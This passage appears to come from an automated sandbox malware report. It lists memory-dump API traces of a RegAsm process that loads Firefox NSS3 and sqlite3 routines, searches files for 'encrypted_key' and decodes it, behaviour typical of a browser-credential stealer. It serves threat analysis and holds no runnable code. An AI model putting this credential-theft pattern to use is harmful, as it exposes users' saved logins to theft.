                                                                                                          • Part of subcall function 6C2C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C2C0AC8
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsmprintf.NSS3(?,?), ref: 6C2C0AE8
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0B19
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0B48
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0C76
                                                                                                          • Part of subcall function 6C2C09D0: PR_LogFlush.NSS3 ref: 6C2C0C7E
                                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C1E2D22
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0B88
                                                                                                          • Part of subcall function 6C2C09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2C0C5D
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C2C0C8D
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0C9C
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0CD1
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C2C0CEC
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0CFB
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0D16
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C2C0D26
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0D35
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C2C0D65
                                                                                                          • Part of subcall function 6C2C09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C2C0D70
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0D90
                                                                                                          • Part of subcall function 6C2C09D0: free.MOZGLUE(00000000), ref: 6C2C0D99
                                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C1E2D3B
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C2C0BAB
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0BBA
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0D7E
                                                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C1E2D54
                                                                                                          • Part of subcall function 6C2C09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C2C0BCB
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0BDE
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0C16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$n,l
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B48A2
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1B48C4
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C1B48D8
                                                                                                        • memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C1B48FB
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C1B4908
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C1B4947
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C1B496C
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1B4988
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8DAC,?), ref: 6C1B49DE
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B49FD
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1B4ACB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00415845
                                                                                                        • _memset.LIBCMT ref: 00415856
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2
                                                                                                        • StrStrA.SHLWAPI(00000000), ref: 0041596A
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00415A8C
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                          • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                          • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00415A18
                                                                                                        • StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415A54
                                                                                                        • lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                        APIs
                                                                                                        • sqlite3_initialize.NSS3 ref: 6C282D9F
                                                                                                          • Part of subcall function 6C13CA30: EnterCriticalSection.KERNEL32(?,?,?,6C19F9C9,?,6C19F4DA,6C19F9C9,?,?,6C16369A), ref: 6C13CA7A
                                                                                                          • Part of subcall function 6C13CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C13CB26
                                                                                                        • sqlite3_exec.NSS3(?,?,6C282F70,?,?), ref: 6C282DF9
                                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C282E2C
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E3A
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E52
                                                                                                        • sqlite3_mprintf.NSS3(6C2EAAF9,?), ref: 6C282E62
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E70
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E89
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282EBB
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282ECB
                                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C282F3E
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282F4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1957633107-0
                                                                                                        • Opcode ID: a7ced5a654bb510b43b7bb1ace1689e4583ae617ecc6423539a9ff0c671a06e7
                                                                                                        • Instruction ID: 60253af7fa3e9e50b52af33ffff753670432a73cd75917cfce1b263ae40d9567
                                                                                                        • Opcode Fuzzy Hash: a7ced5a654bb510b43b7bb1ace1689e4583ae617ecc6423539a9ff0c671a06e7
                                                                                                        • Instruction Fuzzy Hash: 186163F5E0221A8BEB00CF68D894BDE77B1EF58349F144024EC59A7781E735E859CBA1
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(6C1D3F23,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C62
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C76
                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C86
                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C93
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2CC6
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2CDA
                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23), ref: 6C1D2CEA
                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?), ref: 6C1D2CF7
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?), ref: 6C1D2D4D
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1D2D61
                                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C1D2D71
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D2D7E
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                        • String ID:
                                                                                                        • API String ID: 2446853827-0
                                                                                                        • Opcode ID: a660a47d6022711875fcf074786c01550463ccd247af2f63303bb2ca088e1f50
                                                                                                        • Instruction ID: 54edf08d44283e9717dbb7ffbd65940c4f64238e335da8eaa8f77f955ad7a226
                                                                                                        • Opcode Fuzzy Hash: a660a47d6022711875fcf074786c01550463ccd247af2f63303bb2ca088e1f50
                                                                                                        • Instruction Fuzzy Hash: CC51F376E00604AFDB009F24EC85AAAB778FF25218F058524EC2897B11E731FD64C7E2
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D11
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D2A
                                                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D4A
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D57
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D97
                                                                                                        • PR_Lock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134DBA
                                                                                                        • PR_WaitCondVar.NSS3 ref: 6C134DD4
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134DE6
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134DEF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3388019835-0
                                                                                                        • Opcode ID: 67f1515208def38120333ab9119d679ded665892caf3794a3190cf7ed0e14aaa
                                                                                                        • Instruction ID: 424b64ee2a97ab7dedfb2fd691f98900ca5087d3cf1fe71cb90a6f4f9337316b
                                                                                                        • Opcode Fuzzy Hash: 67f1515208def38120333ab9119d679ded665892caf3794a3190cf7ed0e14aaa
                                                                                                        • Instruction Fuzzy Hash: A2418EB5A04765CFCB00EF78D484299BBB8BF16318F065669DC8C9BB10E731D884CB91
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833677464-0
                                                                                                        • Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                                                        • Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
                                                                                                        • Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                                                        • Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D
                                                                                                        APIs
                                                                                                          • Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
                                                                                                          • Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD
                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
                                                                                                        • GetLastError.KERNEL32 ref: 0040160C
                                                                                                        • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
                                                                                                        • GetWindowContextHelpId.USER32(00000000), ref: 0040161B
                                                                                                        • GetWindowLongW.USER32(00000000,00000000), ref: 00401623
                                                                                                        • RegisterClassW.USER32(00000000), ref: 0040162A
                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00401631
                                                                                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
                                                                                                        • IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040165D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 3627164727-0
                                                                                                        • Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                                                                        • Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
                                                                                                        • Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                                                                        • Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE
                                                                                                        APIs
                                                                                                        • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FAF
                                                                                                        • PR_Now.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FD1
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FFA
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9013
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9042
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D905A
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9073
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D90EC
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9111
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                        • String ID: n,l
                                                                                                        • API String ID: 2831689957-3692751573
                                                                                                        • Opcode ID: aeb3df37d19621e4c4aa6f30549b752c68140ccad8b429332f572d4c5c263965
                                                                                                        • Instruction ID: 2c01db624ed488db94e8673b7475fe49b0e6559b9fc33b581e0eb012dbbe0221
                                                                                                        • Opcode Fuzzy Hash: aeb3df37d19621e4c4aa6f30549b752c68140ccad8b429332f572d4c5c263965
                                                                                                        • Instruction Fuzzy Hash: CB519C75A046048FDF00EF78C4E8299BBF8BF4A314F0645A9DC459BB45EB35E885CB91
                                                                                                        APIs
                                                                                                        • PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C1BE93B
                                                                                                        • PR_SetError.NSS3(FFFFE075,00000000), ref: 6C1BE94E
                                                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6C1BE995
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C1BE9A7
                                                                                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C1BE9CA
                                                                                                        • PORT_Strdup_Util.NSS3(6C2F933E), ref: 6C1BEA17
                                                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6C1BEA28
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C1BEA3C
                                                                                                        • free.MOZGLUE(?), ref: 6C1BEA69
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
                                                                                                        • String ID: http://
                                                                                                        • API String ID: 3982757857-1121587658
                                                                                                        • Opcode ID: 6a516b277a59ce27cb0a11d578d8f3388d0593241c7aae56b3267e988e661d86
                                                                                                        • Instruction ID: 6a820b553556d2d42c628c5196ed501d033f11eaeefa2020adb43a5704aa447d
                                                                                                        • Opcode Fuzzy Hash: 6a516b277a59ce27cb0a11d578d8f3388d0593241c7aae56b3267e988e661d86
                                                                                                        • Instruction Fuzzy Hash: D241AD7094460A4BEB605A688C817EA77A9AF2734CF1401A1EC90F7F41E231975ECEE2
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6C1E6C66
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E6C94
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E6CA3
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E6CB9
                                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C1E6CD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
